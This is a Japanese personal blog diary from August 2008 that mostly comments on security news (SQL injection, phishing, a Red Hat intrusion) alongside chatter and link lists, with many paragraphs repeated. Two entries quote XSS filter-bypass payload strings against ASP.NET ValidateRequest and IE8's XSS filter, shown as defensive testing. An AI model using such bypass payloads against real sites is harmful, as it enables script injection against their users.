[セキュリティ] * NHKスペシャルデジタルネイティブ 〜次代を担う若者たち〜
経由。 セキュリティ&プログラミングキャンプ2008の参加者インタビューが動画で観れます。 FFR村上さんや、うえひろくんや、Stacyさんの動画もありますね♪(^-^)[雑談] * 社会人になるまで経験したことがなかったことランキング (goo)
“飛行機でビジネスクラスに乗る” “高級料理店で食事をする” というのも十分うらやましいけど、やっぱり一番うらやましいのは・・・“異性とつきあう” でしょうかw リア充めw[セキュリティ] * 急増するSQLインジェクション攻撃--被害は一般ユーザーへも (CNET)
最近の中国からの攻撃は、Googleを使って脆弱性が存在するWebページを探索し、SQLインジェクション攻撃を試みるという一連の流れがボット化されて全自動で動いているそうです。(@_@)関連: * ビジネス化がさらに加速するサイバー攻撃 〜進化し続けるアンダーグラウンドビジネス
[雑談] * 「レンコン=拳銃」総務省が犯罪検知ソフト開発へ 十数億円規模 (ITmedia)
0億円、2時間で作るのは誰ですか?(ちがうw
[security][xss][徳丸] “大垣さんの上記2エントリは、私にはさっぱり理解できない。” ★★★[雑談] * ねとらぼ: 山手線の電光掲示板が腕時計に (ITmedia)
JR山手線ホームの電光掲示板をドット単位まで忠実に再現した腕時計。>Ikegamiさん向けw[セキュリティ] * SQLインジェクションを防ぐプロキシ「GreenSQL」 (MOONGIFT)
mi1kmanさんのブクマ経由。 DBサーバ(MySQLのみ対応)と Webサーバとの間でプロキシとして動作して “問題があるSQL” をはじいてくれるらしい。 正常時の通信を学習して...というわけではなく、DROP や CREATE などの、通常では使わないであろうコマンドを落とす仕組みらしい。 落としたくない通信はホワイトリストに追加すれば良いとのこと。 ……DB側の権限の設定ではダメ?(ぇw[雑談] いろいろ。
←嵐の山荘!! 名探偵登場?
[雑談] ソフトボール・金メダル☆解説の人が解説できてない&優勝決まった途端に泣き出してしまったw NHKで「次から次へとFAXが来てます!」と紹介されるFAXが、同じ名字の人(周防市・河村さん)のものばかりw
- 葉っぱさん
経由。 セキュリティ&プログラミングキャンプ2008の参加者インタビューが動画で観れます。 FFR村上さんや、うえひろくんや、Stacyさんの動画もありますね♪(^-^)[雑談] * 社会人になるまで経験したことがなかったことランキング (goo)
“飛行機でビジネスクラスに乗る” “高級料理店で食事をする” というのも十分うらやましいけど、やっぱり一番うらやましいのは・・・“異性とつきあう” でしょうかw リア充めw[セキュリティ] * 急増するSQLインジェクション攻撃--被害は一般ユーザーへも (CNET)
最近の中国からの攻撃は、Googleを使って脆弱性が存在するWebページを探索し、SQLインジェクション攻撃を試みるという一連の流れがボット化されて全自動で動いているそうです。(@_@)関連: * ビジネス化がさらに加速するサイバー攻撃 〜進化し続けるアンダーグラウンドビジネス
[雑談] * 「レンコン=拳銃」総務省が犯罪検知ソフト開発へ 十数億円規模 (ITmedia)
0億円、2時間で作るのは誰ですか?(ちがうw
textileサイト上の情報を犯罪性有りと判断すれば、運営企業へ自動的に知らせ、サイト運営企業は内容を確認した上でその情報を削除する。「レンコン=拳銃」など、キーワードが柔軟なのは良いですが、その分、誤検知が増えそう。 そして、誤検知をさばくのはサイト運営者側・・・。 ひどい話だ。(ぇw[セキュリティ] * プログラミングではホワイトリスティングが基本ではない (徳丸さん)
[security][xss][徳丸] “大垣さんの上記2エントリは、私にはさっぱり理解できない。” ★★★[雑談] * ねとらぼ: 山手線の電光掲示板が腕時計に (ITmedia)
JR山手線ホームの電光掲示板をドット単位まで忠実に再現した腕時計。>Ikegamiさん向けw[セキュリティ] * SQLインジェクションを防ぐプロキシ「GreenSQL」 (MOONGIFT)
mi1kmanさんのブクマ経由。 DBサーバ(MySQLのみ対応)と Webサーバとの間でプロキシとして動作して “問題があるSQL” をはじいてくれるらしい。 正常時の通信を学習して...というわけではなく、DROP や CREATE などの、通常では使わないであろうコマンドを落とす仕組みらしい。 落としたくない通信はホワイトリストに追加すれば良いとのこと。 ……DB側の権限の設定ではダメ?(ぇw[雑談] いろいろ。
- 「iPhone 3G」を作っている少女の写真など4枚がiPhoneごと出荷される (GIGAZINE)
- an・an曰く「男は顔で選ぶな!」「オトコの外見は内面から生まれる」 (痛いニュース)
- 山谷剛史のマンスリー・チャイナネット事件簿 (INTERNET Watch)
- 1番でも2番でもなく―2009年度新卒は「3番目」がお好き? (ITmedia)
- 佐渡島で大雨、山荘の短大生ら34人孤立 (asahi.com)
←嵐の山荘!! 名探偵登場?
- 英国軍のハイテク兵器コンテストに「空飛ぶ円盤」が出品される (/.jp)
[雑談] ソフトボール・金メダル☆解説の人が解説できてない&優勝決まった途端に泣き出してしまったw NHKで「次から次へとFAXが来てます!」と紹介されるFAXが、同じ名字の人(周防市・河村さん)のものばかりw
2008/08/22(金)金曜日ー。(プロアクティブとリアクティブ???)
[セキュリティ] * Bypassing ASP.NET "ValidateRequest" for Script Injection Attacks
経由。 ASP.NET の XSS防御フィルタの回避手法についてのホワイトペーパー。 手元の環境では、「<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>」でのスクリプトの実行は確認できませんでしたが、確かにフィルタは抜けるようです。 「~」が無ければ実行できますがフィルタにかかりますw 「~」を「%」に変えると、ただの ASP 環境だと「%」が消えて実行できたりしますが、ASP.NET だと「%」がそのまま残って実行できない? うーむ、もうちょっと真面目に読んで検証しないとダメだな。orz[雑談] * (´・ω・`)2ちゃんねるの犯罪者、金バエです (人生ちゅまんね)
名古屋駅での殺人を予告したことで逮捕&拘留されたひとの体験談。 興味深い。[セキュリティ] * Web開発者の必須知識、Webアプリの不正遷移対策とは? (CodeZine)
経由。 “「戻る」ボタンを押すと「白い画面」になる” のは、時代遅れの「不正遷移対策」だと言っていますが、キャッシュに機微情報が残らないようにしてるとか何か他に理由ないかな。[雑談] * 発表することのダークサイド (kinnekoさん)
「向き不向きがあって誰にでもできることじゃない」、「二度と立ち上がれないダメージをこうむる」、「発表できるネタないと人生ダメだなとか、発表もできないなんて業界で食べていけないというようなコンプレックスに思っちゃう人も出る」というあたりが、心にビンビンひびきましたw[出来事] * 他人の旅程にアクセス可 ジャルパック、システム不具合 (asahi.com)
経由。 識別子をずらすことで自分以外の18万人分の利用者の名前や旅行日程が閲覧できる状態だったことが利用者からの指摘で発覚。 住所や電話番号、カード番号などは漏れていない。[雑談] いろいろ。
- kikuz0uさん
経由。 ASP.NET の XSS防御フィルタの回避手法についてのホワイトペーパー。 手元の環境では、「<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>」でのスクリプトの実行は確認できませんでしたが、確かにフィルタは抜けるようです。 「~」が無ければ実行できますがフィルタにかかりますw 「~」を「%」に変えると、ただの ASP 環境だと「%」が消えて実行できたりしますが、ASP.NET だと「%」がそのまま残って実行できない? うーむ、もうちょっと真面目に読んで検証しないとダメだな。orz[雑談] * (´・ω・`)2ちゃんねるの犯罪者、金バエです (人生ちゅまんね)
名古屋駅での殺人を予告したことで逮捕&拘留されたひとの体験談。 興味深い。[セキュリティ] * Web開発者の必須知識、Webアプリの不正遷移対策とは? (CodeZine)
- ikepyonさん
経由。 “「戻る」ボタンを押すと「白い画面」になる” のは、時代遅れの「不正遷移対策」だと言っていますが、キャッシュに機微情報が残らないようにしてるとか何か他に理由ないかな。[雑談] * 発表することのダークサイド (kinnekoさん)
「向き不向きがあって誰にでもできることじゃない」、「二度と立ち上がれないダメージをこうむる」、「発表できるネタないと人生ダメだなとか、発表もできないなんて業界で食べていけないというようなコンプレックスに思っちゃう人も出る」というあたりが、心にビンビンひびきましたw[出来事] * 他人の旅程にアクセス可 ジャルパック、システム不具合 (asahi.com)
- まっちゃさん
経由。 識別子をずらすことで自分以外の18万人分の利用者の名前や旅行日程が閲覧できる状態だったことが利用者からの指摘で発覚。 住所や電話番号、カード番号などは漏れていない。[雑談] いろいろ。
- Proactiveセキュリティ対策 vs. Reactiveセキュリティ対策 (大垣靖男さん)
- 時給1500円なんて人生バラ色じゃね? (はてな匿名ダイアリー)
- 桃をおいしく食べる方法と、失われるおばあちゃんの知恵袋 (Aobaさん)
- 心 を 折 ら れ る 画 像 (ささやかな楽しみ)
- 線路に物を投げ込んでスパークさせて遊ぶ若者たち (GIGAZINE)
- MITの学生が電車に無賃乗車する方法を論文で書いて成績トップ (GIGAZINE)
- ハンバーガーを脅し取った暴力団員、組長に代金820円を請求すると言われ支払い応じる
- 好きな人ができて変わったことランキング (gooランキング)
2008/08/23(土)土曜日ー。(あー、東京で開催だとこういう落とし穴が・・・。orz)
[イベント] * 第01回 まっちゃ445勉強会
textileまっちゃ445目覚まし勉強会時間: 10時30分〜12時00分 場所: 大田区産業プラザC会議室 テーマ: 希望者によるライトニングトークあまり知られていない、XSS脆弱性の攻撃のバリエーション (hnwさん)「ISMS審査員補更新手続」狂想曲 (F.koryuさん)5分でわかる? Black Hat USA 2008 & DEFCON 16 (saito@hjさん)まっちゃ445勉強会時間: 13時00分〜16時30分 場所: 大田区産業プラザC会議室 テーマ: 情報セキュリティな勉強会始めるよ! VPN再考〜手軽になったが、その実どこまで何を使う? (wakatonoさん)「なぜ、御社のWebサイトが攻撃されるのか。そして、守るためには何をすればよいのか。」(上野宣さん) まっちゃ445懇親会時間: 18時00分〜20時00分 場所: ニイハオ別館定員60名で、さらにキャンセル待ちが27名も出る大盛況♪ 目覚ましが人で溢れそうだwただいまー。 まっちゃ445勉強会は初めて参加しました(ぇ)が、みなさんに暖かく迎え入れてもらえて幸せでした。 楽しかった〜♪ ものすごく盛況だったため、会場は満杯で、イスがギリギリの数しか無く、途中から会場に来たつれづれさんの席が見あたらなかったとき、向こうの方で「ヤマガタさんなら女の子が近づいたら逃げるから席が空くんじゃないかな」「あたしが近づいたら逃げるかな」とひそひそと話しているのが聞こえましたw おまえらw (・・・ヒザの上で良ければいつでも☆)(←バカw)
2008/08/24(日)日曜日ー。(ノットワークスペシャリスト、笑ったw)
[占い] * モテ弁慶 - モテっぷりが丸分かり
ずきんさん経由。 「中高生」 「20代30代」 相手だと、“モテた人数” が いずれも 0人だったw[雑談] 第01回まっちゃ445勉強会のLT資料&まとめ
[雑談] いろいろ。
[雑談] * Googleストリートビューを使って愛する女にプロポーズする男 (GIGAZINE)
「PROPOSAL 2.0: MARRY ME!!」←これは素敵な2.0w どうやって待ち伏せしたんだろw
ずきんさん経由。 「中高生」 「20代30代」 相手だと、“モテた人数” が いずれも 0人だったw[雑談] 第01回まっちゃ445勉強会のLT資料&まとめ
- 押さえておきたいIE8のセキュリティ新機能 (はせがわようすけ)
- XSS脆弱性に対しXHRを用いた攻撃 (hnwさん)
- 第01回まっちゃ445勉強会: ライトニングトーク (水無月ばけらのえび日記)
[雑談] いろいろ。
- 今こそXSS対策についてまとめよう (徳丸浩の日記)
- 第11回 ハニーポットによるウイルス捕獲から見えてくるもの (@IT)
- 会津若松市がOpenOffice.org導入の経費や職員からの声を公開 (/.jp)
- パスワード保護」されたウイルス出現、狙いは「対策ソフトの回避 (ITPro)
- 滑り込むぬこ (ニコニコ動画)
- 面接で、ねぇよwwwwと思った質問とその回答書いてけ (ワラノート)
- ウィンドウズな窓! (GIZMODO Japan)
- 箱○テイルズ、レベルアップやゲーム内のお金をDLCで販売 (痛いニュース)
- 銀行のミスで口座に2800万→食料買って貧困者に配る→遺失物横領で逮捕
- ネットカフェ難民に月15万円の生活費融資へ…厚労省 (痛いニュース)
- インテルが電源コード不要の「ワイヤレス電力」を開発 (GIGAZINE)
- 凄い回文教えてくれ (ベア速)
- 理系のための恋愛論 (291) 「かわいいなぁ」、そこから先への進み方 (MYCOM)
[雑談] * Googleストリートビューを使って愛する女にプロポーズする男 (GIGAZINE)
「PROPOSAL 2.0: MARRY ME!!」←これは素敵な2.0w どうやって待ち伏せしたんだろw
2008/08/25(月)月曜日ー。(好きのしるしのキス☆ (←回文))
[雑談] * 資料公開「なぜ、御社のWebサイトが攻撃されるのか。」 (上野宣さん)
TIPさんが、第01回まっちゃ445勉強会の資料を公開してくださっています♪(^-^)[雑談] いろいろ。
←空気です。orz
[TV][あいのり] #416 一球入魂マリ縦断中。 矢印: 海->桃->こーすけ<=>よっこ。 シュレック、ヤマジ。海が桃に渡そうと、想いを込めてペアのシルバーリングを作る。海“本当笑ってる笑顔も好きだし 声も好きだし しゃべってて楽しいっていうのもあったし 自分の気持ちが高ぶってきたら 抑えられなくなっちゃうんですよね”海が桃に告白。 チケットと指輪を渡す。海「なんか 自分の気持ちが高ぶってて すげぇ好きって思えたの ほんとね 口で言うのがね わかんなくてね すげぇ守ってあげたいなって思った じゃあ明日 返事を待ってます」桃“海って超幸せにしてくれそうなタイプじゃないですか 優しいし 頼れるし うれしい時 すごいうれしそうな顔したりするんですよ”スタッフ「海の気持ちは桃に伝わった?」 桃「うーん・・・あんまりそんな強い気持ちを言ってこなかったから どこが好きなのかがあんまり伝わらなかったけど」翌日、運命の朝。 桃から海に告白の返事。海「ほんとに いつも その笑顔に ほんとに助けられてて ほんとに笑顔を見てるだけですごい幸せで ほんとに心の底から 桃のことが大好きだって言えるようになってて 何があっても桃を守っていきたいから 一緒に日本に帰って下さい」桃「海のことはすごい大好きなんだけど それは仲間としてであって恋愛感情ではなかった だから海とは一緒に帰れません ありがとう」5カ国も旅をしていたのに、海、ほとんど放送に出ていなかったですねw もしも今回、桃が、こーすけへの恋愛をあきらめて近場の海で妥協してしまったら許せない!と思っていたのですが、桃、ちゃんと断ってくれて良かった。 これからもほんとに幸せになれる相手を探して旅を続けて貰いたいと思う。 来週は男性新メンバー2人が合流らしい。⇒* 今週のあいのり
、 * あいのりウラ話(海からのメール)
TIPさんが、第01回まっちゃ445勉強会の資料を公開してくださっています♪(^-^)[雑談] いろいろ。
- [matcha445] 居たの? 気付かなかった。 (はせがわようすけ)
←空気です。orz
- mixiに「あなたの友人かも?」機能 「おすすめマイミク」を正式化 (ITmedia)
- イーバンク銀行、一部取り引きで入出金が重複する不具合 (INTERNET Watch)
- ゲームのバグそっくりに、タイガー・ウッズさん自身が再現する (やじうまWatch)
- 「初音ミク」コスプレで踊る10歳の米国少女 (ITmedia)
- 電話ハッカー、米国政府持ちで国際電話 (CNET)
- ユカタン半島の地下でマヤ文明への入り口が見つかる? (GIGAZINE)
- JavaScriptのアラートボックスをセクシーにする仕組み (PHPSPOT)
- Firefoxを使ってサイトのモックアップを簡単に作成する「Pencil」 (MOONGIFT)
- 子どもと携帯のフキゲンな出会い (ExciteBit)
[TV][あいのり] #416 一球入魂マリ縦断中。 矢印: 海->桃->こーすけ<=>よっこ。 シュレック、ヤマジ。海が桃に渡そうと、想いを込めてペアのシルバーリングを作る。海“本当笑ってる笑顔も好きだし 声も好きだし しゃべってて楽しいっていうのもあったし 自分の気持ちが高ぶってきたら 抑えられなくなっちゃうんですよね”海が桃に告白。 チケットと指輪を渡す。海「なんか 自分の気持ちが高ぶってて すげぇ好きって思えたの ほんとね 口で言うのがね わかんなくてね すげぇ守ってあげたいなって思った じゃあ明日 返事を待ってます」桃“海って超幸せにしてくれそうなタイプじゃないですか 優しいし 頼れるし うれしい時 すごいうれしそうな顔したりするんですよ”スタッフ「海の気持ちは桃に伝わった?」 桃「うーん・・・あんまりそんな強い気持ちを言ってこなかったから どこが好きなのかがあんまり伝わらなかったけど」翌日、運命の朝。 桃から海に告白の返事。海「ほんとに いつも その笑顔に ほんとに助けられてて ほんとに笑顔を見てるだけですごい幸せで ほんとに心の底から 桃のことが大好きだって言えるようになってて 何があっても桃を守っていきたいから 一緒に日本に帰って下さい」桃「海のことはすごい大好きなんだけど それは仲間としてであって恋愛感情ではなかった だから海とは一緒に帰れません ありがとう」5カ国も旅をしていたのに、海、ほとんど放送に出ていなかったですねw もしも今回、桃が、こーすけへの恋愛をあきらめて近場の海で妥協してしまったら許せない!と思っていたのですが、桃、ちゃんと断ってくれて良かった。 これからもほんとに幸せになれる相手を探して旅を続けて貰いたいと思う。 来週は男性新メンバー2人が合流らしい。⇒* 今週のあいのり
、 * あいのりウラ話(海からのメール)
2008/08/26(火)火曜日ー。(焼き芋、落とすと思いきや。(←回文))
[セキュリティ] * グーグル、クッキーの安全強化のためSSLを変更 (CNET)
あ、ほんとに Cookie の secure属性の話だったんだ?! DEFCON で話題にするほどの……。関連: * Automated HTTPS Cookie Hijacking
/ * Why the Gmail HTTPS "Fix" Isn’t
[雑談] 呼んだ? (←呼んでないw)
[セキュリティ] * 本物のサイトにログインできるフィッシング詐欺 (ITmedia)
“新たに発見した” と言っていますが、ID・パスワードを本物サイトに中継して正しい応答をするようなフィッシングサイトは、* 日本では2004年にはすでに存在
していましたね。 後半の処理をそのまま本物サイトに移行するかどうかが若干違いますけど、コンセプト的には同じようなものかな。[雑談] * Security+を受験しました (セキュリティでつむぐハルカな未来!)
情報セキュリティのスター候補第一期生のブログ。 一ヶ月に一記事のペースですね。(^-^;[出来事] * Red Hatの社内システムに不正侵入 (ITmedia)
経由。 Red Hat の社内システムに何者かが侵入し、OpenSSH のパッケージを改ざんして署名を付けて出て行ったらしい? 詳細は調査中? とりあえずアップデートが公開されている。[雑談] いろいろ。
[雑談] * Steve Jobs Stanford Commencement Speech 2005 (字幕.in)
2005年スタンフォード大の卒業式でのスティーブ・ジョブスのスピーチ。 なんか感動。(>_<)
あ、ほんとに Cookie の secure属性の話だったんだ?! DEFCON で話題にするほどの……。関連: * Automated HTTPS Cookie Hijacking
/ * Why the Gmail HTTPS "Fix" Isn’t
[雑談] 呼んだ? (←呼んでないw)
- ダメな俺を丸ごと受け止めてくれ症候群 (はてな匿名ダイアリー)
- あなたに興味はないの (はてな匿名ダイアリー)
- 女同士の『カワイイー』は、本当は可愛くないのに言ってる (はてな匿名ダイアリー)
- 彼女ができた (はてな匿名ダイアリー)
[セキュリティ] * 本物のサイトにログインできるフィッシング詐欺 (ITmedia)
“新たに発見した” と言っていますが、ID・パスワードを本物サイトに中継して正しい応答をするようなフィッシングサイトは、* 日本では2004年にはすでに存在
していましたね。 後半の処理をそのまま本物サイトに移行するかどうかが若干違いますけど、コンセプト的には同じようなものかな。[雑談] * Security+を受験しました (セキュリティでつむぐハルカな未来!)
情報セキュリティのスター候補第一期生のブログ。 一ヶ月に一記事のペースですね。(^-^;[出来事] * Red Hatの社内システムに不正侵入 (ITmedia)
- まっちゃさん
経由。 Red Hat の社内システムに何者かが侵入し、OpenSSH のパッケージを改ざんして署名を付けて出て行ったらしい? 詳細は調査中? とりあえずアップデートが公開されている。[雑談] いろいろ。
- 電動化社会に潜む罠にまんまとはまった日記 (スイーツにはほど遠い)
- 文学やネットの世界では、なぜ猫の支持率が高いのか? (R25.jp)
- ドラえもんは太すぎて、家の廊下を歩けない!?―アニメのお宅の間取りを拝見 (ITmedia)
- IE 8に閲覧履歴を残さないプライバシー機能 (ITmedia)
- 徹子の玉ねぎ頭からキャンディーが!!! (ぁゃιぃ(*゜ー゜)NEWS 2nd)
- ちょっとグロテスクだけど…深海魚を食べてみた (asahi.com)
- 太陽発電で飛ぶ無人飛行機、82時間37分の飛行に成功 (ITmedia)
- 韓国人にとっての「たまごかけごはん」とは (ExciteBit)
- SL女子によるファッション放談会 (MYCOM)
- 酒場で見えてきた“職場でのあの行動”の背景 (NBonline)
- なぜ優秀な社員ばかり辞めていくのか (CW)
- 「できる部下」の管理術、「できない上司」の対処法 (CW)
[雑談] * Steve Jobs Stanford Commencement Speech 2005 (字幕.in)
2005年スタンフォード大の卒業式でのスティーブ・ジョブスのスピーチ。 なんか感動。(>_<)
2008/08/27(水)水曜日ー。(Stay hungry. Stay foolish.)
[セキュリティ] * はまちちゃんのセキュリティ講座:第1回 HTTPのしくみを復習しよう
mixi に CSRFで日記が増殖するゼロデイ(笑)を仕掛けたことで有名なはまちちゃんの連載。[雑談] * トトロが夏バテにかかったようです (ワラノート)
トトロやナウシカやラピュタや魔女の宅急便やポニョからもキャストが出演w 可愛いw[セキュリティ] * Apache-Tomcatと冗長なUTF-8表現(CVE-2008-2938検証レポート)
経由。 なつかしの IIS Unicode Bug とほぼ同じ。 次は Double-decode Bug か?!w[雑談] * シャイな女性エンジニアが密かに愛の告白をする10の方法 (Geekなページ)
ICMP Echo Request に間に合うようにリプライ返すのは困難だなぁw あらかじめ仕組みを作りこんでおかなきゃw (Webサーバのアクセスログに愛の告白をしたい方はあらかじめご連絡くださいw)[雑談] いろいろ。
[セキュリティ] * ディアイティ「暴露ウイルス体験ツール」を無償配布 (DIT)
経由。 Winnyなどを介してウイルスに感染した場合に、どのようなファイルがどのようなファイル名でネットワーク上に流出するかを擬似体験することができるツール。 面白い発想だ。[雑談] * 海賊版XPは壁紙が真っ黒に、MSが一部地域で違法コピー対策強化 (IMPRESS)
経由。 これは笑えるけど、意外と効果的なのかもw (ま、60分ごとに壁紙の設定を元に戻すツールとかすぐに作られちゃいそうですけどねw)
mixi に CSRFで日記が増殖するゼロデイ(笑)を仕掛けたことで有名なはまちちゃんの連載。[雑談] * トトロが夏バテにかかったようです (ワラノート)
トトロやナウシカやラピュタや魔女の宅急便やポニョからもキャストが出演w 可愛いw[セキュリティ] * Apache-Tomcatと冗長なUTF-8表現(CVE-2008-2938検証レポート)
- まっちゃさん
経由。 なつかしの IIS Unicode Bug とほぼ同じ。 次は Double-decode Bug か?!w[雑談] * シャイな女性エンジニアが密かに愛の告白をする10の方法 (Geekなページ)
ICMP Echo Request に間に合うようにリプライ返すのは困難だなぁw あらかじめ仕組みを作りこんでおかなきゃw (Webサーバのアクセスログに愛の告白をしたい方はあらかじめご連絡くださいw)[雑談] いろいろ。
- 「ウォー・ドライビング」とは? 史上最大規模の個人情報“盗聴”事件が発覚
- 「女性は結婚しなくても幸せ」55%…読売調査 (読売新聞)
- 【第28回】社内恋愛の衰退で“結婚氷河期”到来 (日経BP)
- 【第35回】私はやっぱりキレる寸前。キレずに済む方法はある? (日経BP)
- 「アクセル踏むとすぐにスピード出ます」と注意しなかったディーラーを送検
- 地震に強いPHS:理由は基地局のシステムにあった (読売新聞)
- アイス作ろうと…ドライアイス入り容器破裂、女性重傷 (asahi.com)
- 確かに一理!「報連相なんてムダ!」という外国人ビジネスマンの言い分
- おかずは気持ちが入っていればなんでもいいよ (ぁゃιぃ(*゜ー゜)NEWS 2nd)
[セキュリティ] * ディアイティ「暴露ウイルス体験ツール」を無償配布 (DIT)
- ずきんさん
経由。 Winnyなどを介してウイルスに感染した場合に、どのようなファイルがどのようなファイル名でネットワーク上に流出するかを擬似体験することができるツール。 面白い発想だ。[雑談] * 海賊版XPは壁紙が真っ黒に、MSが一部地域で違法コピー対策強化 (IMPRESS)
textile海賊版のWindows XP Professionalを使っているユーザーに対して、ログイン後のデスクトップ画面の壁紙を黒一色にする。壁紙は元に戻せるが、60分が経過すると再び黒一色の状態に戻るという。
- まっちゃさん
経由。 これは笑えるけど、意外と効果的なのかもw (ま、60分ごとに壁紙の設定を元に戻すツールとかすぐに作られちゃいそうですけどねw)
2008/08/28(木)木曜日ー。(けだるき一日生きるだけ。(←回文))
[セキュリティ] * アライ出し(32) 難読化するマルウェア-迷惑メールとマルウェア(1)
6月〜8月に流行した、CNN、IE7のアップデート、MSNBC などを装ったマルウェア付きメールの話と、添付されていたマルウェアがランタイムパッカーによって難読化されていたという話。関連: * An In-Depth Look into the Win32 Portable Executable File Format (MSDN)
[雑談] * 「価格」ならマクドナルド、「味」ならモスバーガー…人気調査 (痛いニュース)
「ポテト」ならロッテリア……という私は少数派w あの体に悪そうな化学的な味が好きw[セキュリティ] * BGPによるトラフィックの盗聴 (yebo blog)
「本当にインターネットで盗聴とかありえるんですか?」みたいに聞かれた時、「経路上のプロバイダなどで覗かれて被害を受けることは少ないかも知れませんが、送信先の組織内・送信元の組織内での盗聴や、ARP Spoofing、DNSキャッシュポイズニングで・・・」という話になって、最終的に「SSL を正しく使えば・・・」となるのですが、レパートリーに BGP も追加ですかね?w 以前、* パキスタンが自国内でのYouTubeへのアクセスを規制しようとして全世界に障害が波及してしまった件
みたいに、盗聴サーバに誘導する経路情報がどこかに漏れ出たりしなけりゃ良いけど…。(-_-;[雑談] いろいろ。
6月〜8月に流行した、CNN、IE7のアップデート、MSNBC などを装ったマルウェア付きメールの話と、添付されていたマルウェアがランタイムパッカーによって難読化されていたという話。関連: * An In-Depth Look into the Win32 Portable Executable File Format (MSDN)
[雑談] * 「価格」ならマクドナルド、「味」ならモスバーガー…人気調査 (痛いニュース)
「ポテト」ならロッテリア……という私は少数派w あの体に悪そうな化学的な味が好きw[セキュリティ] * BGPによるトラフィックの盗聴 (yebo blog)
http://yebo-blog.blogspot.com「本当にインターネットで盗聴とかありえるんですか?」みたいに聞かれた時、「経路上のプロバイダなどで覗かれて被害を受けることは少ないかも知れませんが、送信先の組織内・送信元の組織内での盗聴や、ARP Spoofing、DNSキャッシュポイズニングで・・・」という話になって、最終的に「SSL を正しく使えば・・・」となるのですが、レパートリーに BGP も追加ですかね?w 以前、* パキスタンが自国内でのYouTubeへのアクセスを規制しようとして全世界に障害が波及してしまった件
みたいに、盗聴サーバに誘導する経路情報がどこかに漏れ出たりしなけりゃ良いけど…。(-_-;[雑談] いろいろ。
- ソースネクスト、USBメモリでソフト販売 CD-ROMは廃止へ (ITmedia)
- 「おまえの子供は預かった」―誘拐犯装うスパム出回る (ITmedia)
- 1,500言語を2000年以上アーカイブするロゼッタ・ディスク (/.jp)
- Google Streetview 削除要求へのGoogleの返答とその変遷 (Brittys Wake)
- 塾講のバイトで教えてた生徒にアタックしてみた (はてな匿名ダイアリー)
- ギガジンさん、間違っています!!! (はてな匿名ダイアリー)
- 【コラム】“ボクっ娘”“俺女”の接し方マニュアル! (R25.jp)
- 地上48階のネットカフェで漫画を読む (ExciteBit)
- PCの電源が落ちまくっていた本当の? 理由 (ExciteBit)
- 日本人は“空気”を読み過ぎ?―有給休暇を消化できない理由 (誠)
2008/08/29(金)金曜日ー。(内科では薬のリスクはでかいな。(←回文))
[雑談] ハインリッヒの法則 情報漏えい事件編「* ハインリッヒの法則 Webアプリケーションセキュリティ版 (TIPさん)
」に触発されて書きましたw
私の座右の銘は、「保護して」でしたw ここをご覧の女性の方、だれか保護してくださいw[出来事] * コンピューターウイルスも宇宙進出、ISSのパソコンで見つかる (AFPBB)
ISS といっても、Internet Scanner や Proventia ではなくて、国際宇宙ステーション(ISS)ですw 感染経路はUSBメモリ?電子メール? (ってか、宇宙ステーションとメールが出来るのね!?(@_@))関連: * USBメモリで感染か:宇宙ステーションがマルウェアに感染 (ITmedia)
[動物] * 遊びたいけど人が怖い保護子猫 (YouTube)
人間への警戒心が解けて、べたべたに甘えてくれる日が来ることを祈っています♪[セキュリティ] * Internet Explorer 8 の XSS Filter (葉っぱ日記)
葉っぱさんが IE8 の XSSフィルタの性能についてテストしてくれた結果が出ています。 param=a%20style%3da%81::expression(alert(1)) のような、マルチバイト文字を挟んだリクエストだとフィルタをすり抜けてしまうらしいです。 (・・・さっき見えた内部IPアドレスは気のせいだろうか?w)
」に触発されて書きましたw
textile1件の「広く話題になった情報漏えい事件」の陰には、 29件の「あまり話題にならなかった情報漏えい事件」があり、その背後には、 300件の「外部に公表されなかった情報漏えい事件」がある。※当然、これはフィクションですとも。[占い] * Yahoo!パートナー - キャッチフレーズ工場
私の座右の銘は、「保護して」でしたw ここをご覧の女性の方、だれか保護してくださいw[出来事] * コンピューターウイルスも宇宙進出、ISSのパソコンで見つかる (AFPBB)
ISS といっても、Internet Scanner や Proventia ではなくて、国際宇宙ステーション(ISS)ですw 感染経路はUSBメモリ?電子メール? (ってか、宇宙ステーションとメールが出来るのね!?(@_@))関連: * USBメモリで感染か:宇宙ステーションがマルウェアに感染 (ITmedia)
[動物] * 遊びたいけど人が怖い保護子猫 (YouTube)
人間への警戒心が解けて、べたべたに甘えてくれる日が来ることを祈っています♪[セキュリティ] * Internet Explorer 8 の XSS Filter (葉っぱ日記)
葉っぱさんが IE8 の XSSフィルタの性能についてテストしてくれた結果が出ています。 param=a%20style%3da%81::expression(alert(1)) のような、マルチバイト文字を挟んだリクエストだとフィルタをすり抜けてしまうらしいです。 (・・・さっき見えた内部IPアドレスは気のせいだろうか?w)
textile他にも違う登山ルートがあるか、またあとで探す。葉っぱさんにとってフィルタの抜けを探すのは登山みたいなものなのねw 「なぜ抜けを探すのですか?」と質問すれば、「そこにフィルタがあるから。」とスタイリッシュに返してくれることでしょうw[雑談] いろいろ。
- オリンピックの競泳で裏技を使い、圧倒的な強さで勝利したドイツの水泳選手
- 会社で飯を出すのは簡単じゃない (おごちゃんの雑文)
- やたーはてなダイアリーファイルシステムできたよ\(^o^)/ (secondlife)
- グーグルの電卓機能が計算ミス (ZDNet)
- iPhoneのロック回避方法がネットで公開 (ITmedia)
- ついに5万円を切った「EeePC900」が登場、軽量で高性能な廉価モデルに (GIGAZINE)
- コムスクエア、ネット監視サービスを一部無料 新規顧客の呼び込み狙う (IT+PLUS)
- 10代男性、彼女にするなら「女子マネージャー」 (ORICON STYLE)
- 失恋したときにすることランキング (gooランキング)
- スターウォーズのヨーダと間違えられてSNS加入を拒否され続けた女性 (GIGAZINE)
- 海自3佐が5千円で女子高校生を買春…厚木基地所属 (ZAKZAK)
- ドバイに110万人が生活できる「未来のピラミッド」、建造計画中 (痛いニュース)
- 若者がモノを買わない理由-「インターネット依存」、「低い上昇志向」 (痛いニュース)
- ブルームバーグが誤ってジョブズの死亡記事を配信 (Engadget)
- 神田明神で「巫女さん入門講座」−メードガイド・マスダさんも受講 (アキバ経済新聞)
- ジェームズ・ボンドになりきれる、まったくデジカメに見えない腕時計 (GIZMODO)
2008/08/30(土)土曜日ー。(女子コンパでパン粉所持。(←回文))
[雑談] * DVDをリッピングソフトを使用してコピーすることは違法ですか? (法務ネット)
DVDの場合は、CDと違って著作権法だけでなく不正競争防止法とか関わってくるのね。[出来事] * 顧客情報100万人分が入ったPCを誤ってイーベイで売却 (AFPBB News)
